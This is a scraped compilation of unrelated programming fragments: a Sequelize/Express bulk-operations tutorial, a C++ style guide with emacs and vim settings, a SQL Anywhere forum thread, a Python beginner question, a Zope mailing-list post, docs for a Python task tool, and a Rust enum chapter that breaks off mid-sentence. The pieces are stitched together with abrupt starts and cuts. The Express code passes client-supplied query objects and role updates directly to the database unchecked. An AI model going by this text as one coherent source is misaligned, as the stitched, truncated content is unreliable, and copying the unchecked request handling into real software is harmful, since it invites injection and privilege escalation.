superagent
  .post('/search')
  .send({ query: myQuery })
  .set('Accept', 'application/json')
  .end(function(err, res){
    if (err || !res.ok) {
      // handle error
    } else {
      // handle success
    }
  });
Our API endpoint would receive it like so:
app.post('/search', (req, res) => {
  const multipleSearch = req.body.query;
  db.pets.findAll({ where: multipleSearch })
  .then(pets => {
    res.json(pets);
  });
});
CREATE: Bulk creation
Creating multiple records is the most straightforward of the bulk operations, because Sequelize has a bulkCreate method that accepts an array of objects.
To create two users at once, we need to send our API an array containing two user objects. Here is the object along with the SuperAgent code the client should send to the creation endpoint.
const owners = [
  {
    name: "John",
    role: "user"
  },
  {
    name: "Sean",
    role: "user"
  }
];

superagent
  .post('/owners/bulk')
  .send({ owners: owners })
  .set('Accept', 'application/json')
  .end(function(err, res){
    if (err || !res.ok) {
      // handle error
    } else {
      // handle success
    }
  });
Here is the endpoint that receives this POST request.
app.post('/owners/bulk', (req, res) => {
  const ownerList = req.body.owners;
  db.owners.bulkCreate(ownerList)
  .then(newOwners => {
    res.json(newOwners);
  })
});
Sequelize's bulkCreate method returns the newly created users. Here is the JSON response our bulk create request produces:
[
  {
    "id": "1c9fa4db-3499-43ed-8378-47c8f53e900a",
    "name": "John",
    "role": "user",
    "created_at": "2016-10-15T20:23:05.020Z",
    "updated_at": "2016-10-15T20:23:05.020Z"
  },
  {
    "id": "b292ff23-9f56-4f15-84ca-68dae355da11",
    "name": "Sean",
    "role": "user",
    "created_at": "2016-10-15T20:23:05.020Z",
    "updated_at": "2016-10-15T20:23:05.020Z"
  }
]
UPDATE: Updating multiple records
Updating and deleting multiple records requires more effort on the part of the developer, because Sequelize doesn't have a method specifically for these operations. However, this gives us an opportunity to take advantage of the Javascript promise functionality built into Sequelize.
There are two steps for updating (or deleting) multiple records. First, you query the records. Second, you update the records. The second step is the trickier of the two.
Step 1: We are going to keep this part as simple as possible. For our API, the client will have to send an array of ids corresponding to the records to be updated. We'll use this array to retrieve the records from the database. We will also need an object containing the columns and values for the update.
If we were to change the role of owners John and Sean from 'user' to 'admin', we would send the following code from the client:
const updateObj = {
  ids: [
    "1c9fa4db-3499-43ed-8378-47c8f53e900a",
    "b292ff23-9f56-4f15-84ca-68dae355da11"
  ],
  updates: {
    role: 'admin'
  }
};
superagent
  .patch('/owners/bulk')
  .send(updateObj)
  .set('Accept', 'application/json')
  .end(function(err, res){
    if (err || !res.ok) {
      // handle error
    } else {
      // handle success
    }
  });
Step 2: Since we are updating existing records, we need to create a PATCH route (note line 11 in our SuperAgent code, too). The first piece of logic we need to code is a query that will search for multiple ids. We can do this by using Sequelize's $in operator (see line 6 below). This operator will read each item in an array.
app.patch('/owners/bulk', (req, res) => {
  const ids = req.body.ids;
  const updates = req.body.updates;

  db.owners.findAll({
    where: { id: { $in: ids } }
  });
  // update logic goes here
})
In the code above, first we grab the ids and the updates from req.body. Then we query the owners table using the $in operator and the array of ids. This query will return all the owners in the ids array. Now we need to apply the updates.
To make sure all of our updates are made before we send a response to the client, we need to use Promise.all(). We've been using promises constantly, as shown by our use of .then(), but we've been dealing with one promise at a time.
The general form of the logic we have been using is "first do X, then do Y, then do Z". Specifically, the logic has been "query the database, then send back a response" or "query the database, then update the record, then send back the response". In these cases, promises allow us to wait until an operation is complete before moving on to the next step.
In the logic outlined above, we are dealing with one operation at a time; do this, then do that. Now that we are updating multiple records, the logic is different. Rather than "do this, then do that", we need logic of the form "Do many operations, once they are all resolved, then do X". This is where Promise.all() comes in.
Let's look at the specifics of our implementation.
app.patch('/owners/bulk', (req, res) => {
  const ids = req.body.ids;
  const updates = req.body.updates;

  db.owners.findAll({
    where: { id: { $in: ids } }
  })
  .then(owners => {
    const updatePromises = owners.map(owner => {
      // the line below creates a new item/promise for
      // the updatePromises array
      return owner.updateAttributes(updates);
    });
    return db.Sequelize.Promise.all(updatePromises)
  })
  .then(updatedOwners => {
    res.json(updatedOwners);
  });
})
After retrieving the array of owner records from the database, we take the array and use it to create a new array of promises. The Javascript .map() method takes an array (in this case owners) and creates a new array from it.
On lines 9 - 13, we take the owners array and use it as material for creating an array called updatePromises. The latter contains one updateAttributes promise for every item in the owners array. We then pass the newly created updatePromises array to Promise.all().
Promise.all() waits for every promise in the updatePromises array to resolve before moving on to the next operation; in this case, sending a response back to the client.
NOTE: The return statement in .map() is very important. If you leave it out, you'll produce a new array of undefined values. For more on Javascript array methods (which are essential for functional programming), check out this informative post.
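To illustrate that pitfall in standalone Node (no Sequelize involved; fakeUpdate here is a stand-in for updateAttributes): mapping without a return yields undefined entries, while returning the promise gives Promise.all() something to wait on.

```javascript
// stand-in for a model instance's updateAttributes()
function fakeUpdate(owner, updates) {
  return Promise.resolve(Object.assign({}, owner, updates));
}

const owners = [{ name: 'John', role: 'user' }, { name: 'Sean', role: 'user' }];

// forgetting `return` inside .map() produces [undefined, undefined]
const broken = owners.map(owner => { fakeUpdate(owner, { role: 'admin' }); });

// returning the promise builds an array Promise.all() can wait on
const updatePromises = owners.map(owner => {
  return fakeUpdate(owner, { role: 'admin' });
});

Promise.all(updatePromises).then(updated => {
  console.log(broken);                   // [ undefined, undefined ]
  console.log(updated.map(o => o.role)); // [ 'admin', 'admin' ]
});
```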
DELETE: Deleting multiple records
Deleting multiple records is similar to updating. In fact, it's slightly simpler because we don't need an update object - an array of ids is all that's required.
app.delete('/owners/bulk', (req, res) => {
  const ids = req.body.ids;
  db.owners.findAll({
    where: { id: { $in: ids } }
  })
  .then(owners => {
    const deletePromises = owners.map(owner => {
      return owner.destroy();
    });
    return db.Sequelize.Promise.all(deletePromises)
  })
  .then(deletedOwners => {
    res.json(deletedOwners);
  });
});
On line 8, we see the .destroy() method at work. If your Sequelize model is set to paranoid: true, the .destroy() method will insert a timestamp indicating when the 'soft deletion' happened, and the record will no longer be returned in queries. If the model is set to paranoid: false, then .destroy() removes the record from the table permanently.
The response this route sends is an array of the deleted records, but it will contain the deleted_at column. Since our model is set to paranoid: true, these records will not be included in future queries.
[
  {
    "id": "1c9fa4db-3499-43ed-8378-47c8f53e900a",
    "name": "John",
    "role": "admin",
    "created_at": "2016-10-15T20:23:05.020Z",
    "updated_at": "2016-10-15T20:23:05.020Z",
    "deleted_at": "2016-10-16T16:16:22.365Z"
  },
  {
    "id": "b292ff23-9f56-4f15-84ca-68dae355da11",
    "name": "Sean",
    "role": "admin",
    "created_at": "2016-10-15T20:23:05.020Z",
    "updated_at": "2016-10-15T20:23:05.020Z",
    "deleted_at": "2016-10-16T16:16:22.365Z"
  }
]
~/.emacs to set it:
;; set default line wrap len: (setq default-fill-column 120)
~/.emacs to activate):
;; NRT indentation style for C++ and such
(defun my-c-mode-common-hook ()
  (local-set-key "\C-h" 'backward-delete-char)
  ;; this will make sure spaces are used instead of tabs
  (setq tab-width 4 indent-tabs-mode nil)
  (setq indent-tabs-mode 'nil)
  (setq c-basic-offset 2)
  (c-set-offset 'substatement-open 0)
  (c-set-offset 'statement-case-open 0)
  (c-set-offset 'case-label 0)
  (c-set-offset 'brace-list-open 0)
  (c-set-offset 'access-label -2)
  (c-set-offset 'inclass 4)
  (c-set-offset 'member-init-intro 4)
  ;; include possible ! as comment start string so that indentation starts after it
  (setq comment-start-skip "/\\*+!* *\\|//+ *")
  ;; type C-c C-s or C-c C-o while editing to see what other rules to add here...
  )
(add-hook 'c-mode-hook 'my-c-mode-common-hook)
(add-hook 'c++-mode-hook 'my-c-mode-common-hook)
(add-hook 'perl-mode-hook 'my-c-mode-common-hook)
(add-hook 'cperl-mode-hook 'my-c-mode-common-hook)
(add-hook 'emacs-lisp-mode-hook 'my-c-mode-common-hook)
(add-hook 'nroff-mode-hook 'my-c-mode-common-hook)
(add-hook 'tcl-mode-hook 'my-c-mode-common-hook)
(add-hook 'makefile-mode-hook 'my-c-mode-common-hook)
"-------------Essential NRT Style Compliance Settings------------- " Disable old-school vi compatability set nocompatible " Allow plugins to control our indentation filetype plugin indent on " Set each auto-indent level to equal two spaces set shiftwidth=2 " Let each tab equal two spaces set tabstop=2 " Make sure vim turns all tabs into spaces set expandtab " Make vim indent our code properly set smartindent " Make the maximum line length equal 120 set textwidth=120 "-------------Other cool vim tricks------------- " Use a cool menu when autocompleting filenames, commands, etc... set wildmenu set wildmode=list:longest " Make vim automatically change directories to the directory of any file you open. " This means that when you open a file, then want to open another using :tabe, :o, etc, " you can just type in the relative path from the file you're currently editing. set autochdir " When editing the NRT library, it is a total pain when you are editing a .H file in nrt/include/whatever/whatever, " and then decide you need to edit the source .C file in the nrt/src/whatever/whatever. This little function will " automatically back track in the directory tree for you, find the corresponding .C or .H file, and open it in a new " tab. " To use it, just type ,o (that's a comma, and then a lower-case o). function! OpenOther() if expand("%:e") == "C" exe "tabe" fnameescape(expand("%:p:r:s?src?include?").".H") elseif expand("%:e") == "H" exe "tabe" fnameescape(expand("%:p:r:s?include?src?").".C") endif endfunction nmap ,o :call OpenOther()<CR>
include/nrt/XXX/MyClass.H: only contains declarations and documentation. Absolutely no actual implementation code, except for one: the serialize or load/save functions. The rationale is that we want these functions to be as close as possible to the list of class data members, so we don't forget to update them if we add/remove data members. Also, only declare things of interest to the end user. Everything in this file should be documented using doxygen markup.
include/nrt/XXX/details/MyClassHelpers.H: contains supporting declarations that must be known before the main declarations in MyClass.H can take effect. For example, if the end user will only use a derived class and the base class contains no information that they should care about, declare the base class in details/MyClassHelpers.H and towards the top of MyClass.H include details/MyClassHelpers.H. There is no doxygen markup in this file, and documentation is optional, mainly geared towards advanced programmers.
include/nrt/XXX/details/MyClassImpl.H: contains inlined and template implementation ONLY. There is no doxygen markup in this file, and documentation is optional, mainly geared towards advanced programmers.
src/nrt/XXX/MyClass.C: contains all non-template, non-inline implementation. Documentation is optional.
include/nrt/XXX/details/MyClassInst.H: contains extern template statements. FIXME.
~/.bash_aliases or
~/.bashrc:
# do a grep on nrt sources:
ng () {
  grep $* `${NRTHOME}/scripts/list-sources.sh`
}
You can use it as follows, for example to find all files that refer to the
Skeleton class:
itti@iLab1:~/nrt$ ng Skeleton
include/nrt/Graphics/ShapeRenderer.H: namespace mocap { class Skeleton; }
include/nrt/Graphics/ShapeRenderer.H: std::map<std::string, nrt::graphics::mocap::Skeleton> & skeletons();
include/nrt/Graphics/ShapeRenderer.H: std::map<std::string, nrt::graphics::mocap::Skeleton> itsSkeletons;
...
NRT uses exclusively the right-to-left convention for const qualifications. This is because it is the best way to unambiguously read statements that have const in them, just read them aloud from right to left. For example:
See for more details and examples. Also see this one: and that one:
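Reading a declaration aloud from right to left, as a quick sketch (illustrative code, not from NRT):

```cpp
#include <cassert>

int value = 1;

// Read right to left: "ptr_to_const is a pointer to a const int".
int const * ptr_to_const = &value;

// "const_ptr is a const pointer to an int": the pointer cannot be
// reseated, but the int it points to can still change.
int * const const_ptr = &value;

int demo() {
  *const_ptr = 2;        // ok: the pointee is not const
  // *ptr_to_const = 3;  // would not compile: the pointee is const
  return *ptr_to_const;  // observes 2 through the read-only view
}
```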
mutable, which will allow it to be locked/unlocked even in const member functions of the class.
const_cast inside the function. For example, consider the BlackboardUID class:
The str() function just returns the UID as a string, so it should be const. However, as noted in the comments, because Blackboard is a Singleton and it has a UID, there is a chicken-and-egg problem with initializing the UID, so we decide to initialize it the first time it is used: the implementation uses a const_cast to set the member variable strID the first time it is requested.
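A minimal sketch of both techniques, using hypothetical names rather than the actual NRT classes: a mutable mutex that a const member function may lock, and a const_cast that lazily initializes a member on first use:

```cpp
#include <mutex>
#include <string>

// Hypothetical class (not actual NRT code) illustrating the techniques above.
class LazyUID {
  public:
    // const accessor that can still lock the mutex, because it is mutable:
    std::string const & str() const {
      std::lock_guard<std::mutex> lock(itsMutex);
      if (itsUID.empty()) {
        // lazily initialize on first use; const_cast is needed because we
        // are modifying a data member from within a const member function:
        const_cast<LazyUID *>(this)->itsUID = "uid-0001";
      }
      return itsUID;
    }

  private:
    mutable std::mutex itsMutex; // mutable: const members may lock it
    std::string itsUID;
};
```

Subsequent calls to str() return the already-initialized string without re-running the initialization.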
If you have used iNVT in the past, here are some key syntax differences:
There are also similar differences with Dims.H, Rectangle.H, etc
shared_ptr. In particular:
class PixType as the pixel type.
class T as the underlying type for the specified pixels; for example, for a function that colorizes a gray image, the input image should always have gray pixels, and the return image should always have color pixels.
Return types should be promoted according to the C/C++ integral type promotion rules. For example, a function that adds two images with byte pixels should have int pixels in the result. Several helper classes and macros are available in NRT to allow this; see Pixels.H, PixelTypes.H, and nrt/Core/Typing/Macros.H. The 3 macros below require that your input image pixels will be named
PixType and your output image pixels will be named
DestType:
typ as the default promotion; this basically defines
DestType = typename nrt::promote<PixType, promo>::type as the default destination type, and
promo has a default value of typ.
DestType = typename nrt::promote<PixType, promo>::type, but
promo has no default value. Use this to remind users that some promotion will occur due to the operation, and they need to think about what that should be and then call the proper version of your function (note that
void is a valid promo value, see nrt::promote).
PixType and DestType
For example:
The result image will have a promoted type because this operation needs to compute weighted averages among pixels, so the weighted sum will have to be in a promoted type. By not providing a default promo, users will have to choose a promotion explicitly when calling the function.
Note that with a
void promotion the results are converted back to the same precision as the source, using nrt::clamped_convert (there is a CPU cost to this as it checks for overflows, e.g., an int value of 300 converted back to byte will be 255). See clamped_convert for details.
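To illustrate that clamping, a stand-in for the behavior (not the actual nrt::clamped_convert implementation) could be:

```cpp
#include <cassert>

// Stand-in sketch for the clamping described above (not the real
// nrt::clamped_convert): converting int back to byte saturates at the
// destination range, e.g. 300 -> 255, and negative values -> 0.
unsigned char clamped_to_byte(int v) {
  if (v < 0) return 0;       // underflow clamps to 0
  if (v > 255) return 255;   // overflow clamps to 255
  return static_cast<unsigned char>(v);
}
```

The range checks on every pixel are where the CPU cost mentioned above comes from.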
Inside the implementation of your function, you should be able to use only PixType and DestType.
You should always try to also write a GenericImage version of your image processing function. GenericImage represents an Image of any pixel type (or almost, there actually is a list in the declaration of GenericImage for all the supported pixels). GenericImage is what we pass between modules in messages, so that users do not have to insert annoying image conversion modules when they build a high-level system.
To use GenericImage you need to:
PixType and DestType as explained above;
Can anyone verify that SA 11.0.1 running on W2K8 x64 can make an external function call to a .NET C# dll? I am getting an object reference error on the call into the dll. The dll has a simple static function to return 1, and was compiled using csc /t:library /out:my.dll /platform:x64
The setup I have works if using SA 11.0.1 on W2K3 x86 with same dll recompiled for x86.
So it can't be the code.
asked 07 Jun '11, 12:32 by JerryY
This configuration should work. Can you confirm which version of the database server is being launched? Is it being launched from the bin32 or the bin64 directory? Is dbextclr11.exe being launched successfully?
Can you provide the SQL procedure you used to create the external function call?
The command used to launch the SA database uses bin64.
When I make my function call, I see that dbextclr11.exe is launched.
My dll code in VS2008 using 2.0 Framework:
namespace CLRDLL
{
public class StaticTest
{
public static int GetValue()
{ return 1; }
}
}
I build the dll and copy it into the bin64 folder of SA.
My function in SA:
ALTER FUNCTION "ev"."fn_clr_test"()
returns integer
external name 'CLRDLL.DLL::CLRDLL.StaticTest.GetValue() int' language CLR
It's important to know that the server is Win2008 R2 running x64.
Error message I get is:
Procedure 'fn_clr_test' terminated with unhandled exception 'Object
reference not set to an instance of an object.'
SQLCODE=-91, ODBC 3 State="HY000"
Here is what I think might be happening in your particular case. In SQL Anywhere 11, the dbextclr11.exe is built with /platform:anycpu. The same is true for the SQL Anywhere .NET Provider which the CLR external environment makes use of. The SA .NET Provider attempts to load some native pieces, including the SQL Anywhere language dll. If the provider ends up loading the 32-bit language dll instead of the 64-bit language dll, then the framework will (most likely) expect everything to work in a 32-bit environment. Hence a dll that is built /platform:x64 will not load as a result. Have a look at your path variable and see if bin32 appears before bin64. That might be why the 32-bit language dll is being loaded. If bin32 does appear before bin64, then try switching the two around within the path and see if that solves the problem. Of course, the other thing you can do is build your dll with /platform:anycpu if possible.
Note that this problem is resolved in SQL Anywhere 12 since the dbextclr12.exe is now built specifically with /platform:x86 (for the bin32 one) and /platform:x64 (for the bin64 one).
answered 07 Jun '11, 16:34 by Karim Khamis
I've verified that the path has SA bin64 before bin32; still get the error. I've recompiled the dll using /platform:anycpu, still the same problem.
I would like to know if anyone out there actually has a working combination of Windows 2008 R2 x64 server + SA 11.0.1 running x64 engine + making external CLR function call ?
Or am I just trying to do something that doesn't work?
Yes, I just tried using a 64-bit SA 11 server and the CLR external environment and it worked fine. I must point out though that I had to compile my test dll using /platform:anycpu due to a build environment issue on my machine, but it did work fine.
Do you have the SA 11 32-bit installed also? That is what my server configuration has both 32 and 64 SA installed. I'm wondering if that is the issue. I'm going to uninstall SA and only install the x64 SA. And see...
Karim, were you running SA on Win2008 server?
After installing only x64 version of SA ... Still the same error.
Yes, I do have both 32 and 64 bit installations on my machine (out of necessity). I think you may have run into a valid bug. If possible, please open a support case and hopefully we will be able to reproduce and resolve the problem that you are running into.
i do have a case open but was hoping that i could find someone who has actually ran into my issue on the forum. Case #11675012
By the way, are you by any chance renaming your dll? It seems like the framework does not like it when you rename the dll to have a name other than what you built the dll as. For example, when I build my test dll using csc and explicitly name the dll as clrtest.dll. All works fine as long as I keep the dll named clrtest.dll. If, however, I rename the dll to be myclrtest.dll, then I suddenly start getting the error you are seeing.
We think we might have solved this problem. Can you please try the following...
Instead of creating your function as:
ALTER FUNCTION "ev"."fn_clr_test"() returns integer external name
'CLRDLL.DLL::CLRDLL.StaticTest.GetValue() int' language CLR
can you instead try:
ALTER FUNCTION "ev"."fn_clr_test"() returns integer external name
'CLRDLL.dll::CLRDLL.StaticTest.GetValue() int' language CLR
Let me know if that is sufficient to work around the problem for you. In the meantime, we will try and put together a proper fix.
Karim
answered 08 Jul '11, 11:19
Karim,
Thanks. That worked.
...whoa! I had to do a file compare to see the difference, must have SET OPTION case_blindness = 'ON' :)
Thanks for verifying the work around. The proper fix has been put into SA 11.0.1 build 2634 and up.
... You're asking for age sensitivity?:)
Me too, so for all others the difference is the lowercase of the dll extension.
last updated: 15 Sep '11, 02:59
SQL Anywhere Community Network
Ok, I'm gonna explain this as best I can.
I am trying to make an if/else statement in python that basically informs the user if they put in the right age based on raw input, but I keep getting an error in terms of my if statement. Can I get some help?
from datetime import datetime
now = datetime.now()

print '%s/%s/%s %s:%s:%s' % (now.month, now.day, now.year, now.hour, now.minute, now.second)
print "Welcome to the beginning of a Awesome Program created by yours truly."
print " It's time for me to get to know a little bit about you"

name = raw_input("What is your name?")
age = raw_input("How old are you?")

if age == 1 and <= 100
    print "Ah, so your name is %s, and you're %s years old. " % (name, age)
else:
    print " Yeah right!"
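A commonly suggested fix (the names match the question; the exact style is a matter of taste) is to convert the raw_input() string to an int and chain the comparison, e.g. as a small helper:

```python
# One way the broken "if age == 1 and <= 100" line is usually fixed:
# convert the raw_input() string to a number and chain the comparison.
def age_is_plausible(age_text):
    age = int(age_text)
    return 1 <= age <= 100
```

The original test then becomes `if age_is_plausible(age): ... else: ...`. Note that raw_input() always returns a string, so comparing it directly to the number 1 can never succeed.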
Derek Richardson wrote:
I believe that that will not guarantee a *universally* unique id, but only an id unique within that ZODB. Am I wrong?

The RFC prescribes a specific algorithm for generating universally unique IDs.
Of course, they are only "universally unique" in a probabilistic way.

It wouldn't be difficult to salt the integer IDs such that they generate UUIDs that are as likely as any other to be unique. Something like this would work:
import uuid
int_id = 42
salt = 0x32352352353243263235235235324326
print uuid.UUID('%X' % (int_id ^ salt))

Another option would be to create an IOBTree to map each object's intid to a randomly generated UUID (generated by the uuid.uuid1 method from the earlier referenced module).
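The salting approach spelled out in modern Python (the salt value is the arbitrary 128-bit constant from the snippet; %032X pads to the 32 hex digits a UUID string requires):

```python
import uuid

# XOR the integer id with a fixed 128-bit salt and render the result as
# a UUID. The same int id always maps to the same UUID.
SALT = 0x32352352353243263235235235324326

def int_to_uuid(int_id):
    return uuid.UUID('%032X' % (int_id ^ SALT))
```

Being deterministic, this keeps a stable mapping from intids to UUIDs without storing anything extra.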
--
Benji York
Senior Software Engineer
Zope Corporation
_______________________________________________
Zope3-users mailing list
Zope3-users@zope.org
REWORK
This is a Python task scheduling and execution tool, which needs only Python and Postgres to work (using SQLAlchemy).
Principles.
Basic usage
Setting up a database
You need a postgresql database. Rework will install its tables into its own
Declaring and scheduling a task

deploy postgres://babar:password@localhost:5432/jobstore
Then, the script will quickly terminate, as both tasks have been executed.
API
The api module exposes most of what is needed. The task module and task objects provide the rest.
api module
Three functions are provided: the task decorator, and the freeze_operations and schedule functions.

Defining tasks is done using the task decorator:
from rework.api import task

@task
def my_task(task):
    ...

task = api.schedule(engine, 'my_task', 42)
The
schedule function wants these mandatory parameters:
engine: sqlalchemy engine
task name: string
task input: any python picklable object
It also accepts two more options:
hostid: an host identifier (e.g. '192.168.1.1')
metadata: a json-serializable dictionary (e.g. {'user': 'Babar'})
Task objects
Task objects can be obtained from the schedule api call (as seen in the previous example) or through the task module.
from task import Task

task = task.by_id(42)
The task object provides:
.state attribute to describe the task state (amongst: queued, running, aborting, aborted, failed, done)
.join() method to wait synchronously for the task completion
.capturelogs(sync=True, level=logging.NOTSET, std=False) method to record matching logs into the db (sync controls whether the logs are written synchronously, level specifies the capture level, std permits to also record prints as logs)
.input attribute to get the task input (yields any object)
.save_output(<obj>) method to store any object
.abort() method to preemptively stop the task
.log(fromid=None) method to retrieve the task logs (all or from a given log id)
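To make the lifecycle behind the .state values explicit, here is a toy model (not the real rework Task class; the transition rules are an illustration only):

```python
# Toy model of the task lifecycle listed above -- not the real rework API.
class ToyTask:
    TERMINAL = ('aborted', 'failed', 'done')

    def __init__(self):
        self.state = 'queued'

    def start(self):
        # a worker picks the task up
        assert self.state == 'queued'
        self.state = 'running'

    def finish(self, ok=True):
        assert self.state == 'running'
        self.state = 'done' if ok else 'failed'

    def abort(self):
        # abort() may preempt a queued or running task
        assert self.state in ('queued', 'running')
        self.state = 'aborting'

    def reap(self):
        # the worker acknowledges the abort request
        assert self.state == 'aborting'
        self.state = 'aborted'
```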
Command line
Operations
If you read the previous chapter, you already know the
init-db and
deploy commands.
The
rework command, if typed without subcommand, shows its usage:
$ rework
Usage: rework [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  abort-task
  deploy
  init-db
  kill-worker
  list-operations
  list-tasks
  list-workers
  log-task
  new-worker
  shutdown-worker
  vacuum
Of those commands, new-worker is for purely internal purposes, and unless you know what you're doing, should not be used directly.
Extensions. | https://bitbucket.org/pythonian/rework/ | CC-MAIN-2018-51 | en | refinedweb |
I have a shortcut I am going to be deploying to all of our end user workstations. It is currently configured to open an IE window in a maximized screen (using the shortcut properties) and open a specific URL.
This particular web application is very sensitive to screen resolution. If IE opens in a non-maximized screen it freaks out and doesn't format the content correctly.
The way I have the shortcut set right now works OK, but it would be even better if it forced it open into kiosk mode so it took up all the screen real estate possible.
The problem with using "iexplore.exe -k" is that it really locks the browser down. No address bar, no way to exit the program short of an Alt-F4. What I want it to do is behave exactly as if the user had pressed F11 to enter fullscreen mode, so that the address bar is available if you mouse up to the top of the screen and you can also just press F11 to go back to a maximized window again.
Is there a way I can do this with a shortcut? For now I'm training my users to open the shortcut and then immediately press F11, but I'd like that to be a little simpler for them.
10 Replies
Give this a go - it get it to start using a script at startup -
From this:...
If you are trying to open Internet Explorer in Maximized view, then follow these steps:
a. Right click on Internet Explorer icon.
b. Click on Properties.
c. Under the Shortcut tab, click on the drop down next to Run.
d. In the drop down options select Maximized.
e. Click Apply and OK.
f. Now check if it works.
1. Procon Latte Content Filter 3.3 - The blacklist / whitelist plugin used to lock down web access to allow only the sites we want accessed from the catalogs. This plugin has password protection integrated so it cannot be easily bypassed. If a patron attempts to go to an unauthorized website, which they can only try if Firefox is not in full screen mode, they are given the following message:
“We’re sorry, that website cannot be viewed on this terminal. To browse the web, please logon to an Internet station.”
2. Menu Editor 1.2.7 - Provides customization / elimination of all menus, including right-click menus, in Firefox. This makes it more difficult for a patron to try to get around our restrictions.
3. Reset Kiosk 0.4 - Closes all tabs, brings up the home page and reactivates full screen mode if not already the current mode, all after a configurable time period of inactivity.
We’ve also created the following script file to remove the visible ways of exiting full screen mode or Firefox, as well as the back and forward buttons but still display the bookmarks:
File:
C:\Documents and Settings\USER\Application Data\Mozilla\Firefox\Profiles\XXX.default\chrome\userChrome.css
Script:
@namespace url(""); /* only needed once */
#autohide-context { display:none!important; } /* hide context menuitem "Exit Full Screen Mode" */
#window-controls { display:none!important; } /* hide window controls in full screen mode */
#back-button { display:none!important; } /* hide back button */
#forward-button { display:none!important; } /* hide forward button */
#PersonalToolbar { visibility:visible!important; } /* display the bookmark toolbar */
We can exit full screen mode by pressing F11. Pressing F11 again re-enters full screen mode.
We can exit by pressing ALT-F4.
We can access the plugins configuration by entering "about:addons" in the address bar.
The icons that were on the desktop before these changes were made are still there so that patrons can still get to things if someone closes Firefox using ALT-F4.
Brand Representative for KioWare Kiosk Software
Not sure what you are working to accomplish and kiosk mode can do a lot, but here's some information that might help with the limitations. . . An article about Chrome Kiosk mode and one about kiosk mode in general.
I'm always interested in making improvement to these articles, so feel free to respond here with any additional feedback.
Laura

Edited May 30, 2014 at 14:17 UTC
Hi, I recently developed a program which has source and header files in vc++! what I want to do is convert the same in C#. I got the idea of source files but how to import/use header files in C#(I want seperate file for class creation/ data initialization like header files)? help me!
C# does not use header files.
Everything is contained in the class itself.
The framework reads the "assembly" to determine what is available to other classes that call it.
You can put your classes in separate files or in separate projects.
Even if you are calling them from c++, you won't need a header.
Old topic, but if you want to use .h files with C#, it really depends upon what you're trying to accomplish.

For instance, I am writing a MemoryStream picture box that will display a bitmap. So I used bin2c to create the .h header file, which contains my bitmap as a byte array that can be streamed. It would be something like:
bin2c -o bit.h image.bmp
Bin2c will creat the bit.h with the file array as a:
/* Generated by bin2c, do not edit manually */ /* Contents of file fake_login1.bmp */ const long int fake_login1_bmp_size = 37676; const unsigned char fake_login1_bmp[37676] = { ... array of bytes ... }
delete the const long int fake_login1_bmp_size = 37676;
change the const unsigned char fake_login1_bmp[37676] to:
public static byte[] bit = { ... array of bytes .. }
add the class
so in all it would look like:
/* Generated by bin2c, do not edit manually */
public class Test
{
    public static byte[] bit = { ... array ... };
}
then to compile the header with your app:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc /target:exe /out:123.exe 123.cs bit.h
===================
to actually use the header byte array it would be something like:
System.Drawing.Image newImage;
MemoryStream stream = new MemoryStream(Test.bit);
newImage = System.Drawing.Image.FromStream(stream);
It's basically creating a class which only contains your "data" or "variable" that you can call. Make sure it's a public class and a public static "variable" (i.e. a byte[] array) so that it can be accessed by any function.
Lastly: if you're trying to use .h files which contain functions written for C++, it's not going to happen; you'll need to convert the C++ API into the C# API with [DllImport].

If it's a C# class within a .h file, it's no different from main.cs, class1.cs, class2.cs, class3.h, class4.h.
Defining an Enum
Let’s look at a situation we might want to express in code and see why enums are useful and more appropriate than structs in this case. Say we need to work with IP addresses. Currently, two major standards are used for IP addresses: version four and version six. These are the only possibilities for an IP address that our program will come across: we can enumerate all possible values, which is where enumeration gets its name.
Any IP address can be either a version four or a version six address, but not both at the same time. That property of IP addresses makes the enum data structure appropriate, because enum values can only be one of the variants. Both version four and version six addresses are still fundamentally IP addresses, so they should be treated as the same type when the code is handling situations that apply to any kind of IP address.
We can express this concept in code by defining an
IpAddrKind enumeration and
listing the possible kinds an IP address can be,
V4 and
V6. These are known
as the variants of the enum:
enum IpAddrKind {
    V4,
    V6,
}
IpAddrKind is now a custom data type that we can use elsewhere in our code.
Enum Values
We can create instances of each of the two variants of
IpAddrKind like this:
let four = IpAddrKind::V4;
let six = IpAddrKind::V6;
Note that the variants of the enum are namespaced under its identifier, and we
use a double colon to separate the two. The reason this is useful is that now
both values
IpAddrKind::V4 and
IpAddrKind::V6 are of the same type:
IpAddrKind. We can then, for instance, define a function that takes any
IpAddrKind:
fn route(ip_type: IpAddrKind) { }
And we can call this function with either variant:
route(IpAddrKind::V4);
route(IpAddrKind::V6);
Using enums has even more advantages. Thinking more about our IP address type, at the moment we don’t have a way to store the actual IP address data; we only know what kind it is. Given that you just learned about structs in Chapter 5, you might tackle this problem as shown in Listing 6-1:
enum IpAddrKind {
    V4,
    V6,
}

struct IpAddr {
    kind: IpAddrKind,
    address: String,
}

let home = IpAddr {
    kind: IpAddrKind::V4,
    address: String::from("127.0.0.1"),
};

let loopback = IpAddr {
    kind: IpAddrKind::V6,
    address: String::from("::1"),
};
Listing 6-1: Storing the data and
IpAddrKind variant of
an IP address using a
struct
Here, we’ve defined a struct
IpAddr that has two fields: a
kind field that
is of type
IpAddrKind (the enum we defined previously) and an
address field
of type
String. We have two instances of this struct. The first,
home, has
the value
IpAddrKind::V4 as its
kind with associated address data of
127.0.0.1. The second instance,
loopback, has the other variant of
IpAddrKind as its
kind value,
V6, and has address
::1 associated with
it. We’ve used a struct to bundle the
kind and
address values together, so
now the variant is associated with the value.
We can represent the same concept in a more concise way using just an enum,
rather than an enum inside a struct, by putting data directly into each enum
variant. This new definition of the
IpAddr enum says that both
V4 and
V6
variants will have associated
String values:
enum IpAddr {
    V4(String),
    V6(String),
}

let home = IpAddr::V4(String::from("127.0.0.1"));

let loopback = IpAddr::V6(String::from("::1"));
We attach data to each variant of the enum directly, so there is no need for an extra struct.
There’s another advantage to using an enum rather than a struct: each variant
can have different types and amounts of associated data. Version four type IP
addresses will always have four numeric components that will have values
between 0 and 255. If we wanted to store
V4 addresses as four
u8 values but
still express
V6 addresses as one
String value, we wouldn’t be able to with
a struct. Enums handle this case with ease:
enum IpAddr {
    V4(u8, u8, u8, u8),
    V6(String),
}

let home = IpAddr::V4(127, 0, 0, 1);

let loopback = IpAddr::V6(String::from("::1"));
We’ve shown several different ways to define data structures to store version
four and version six IP addresses. However, as it turns out, wanting to store
IP addresses and encode which kind they are is so common that the standard
library has a definition we can use! Let’s look at how
the standard library defines
IpAddr: it has the exact enum and variants that
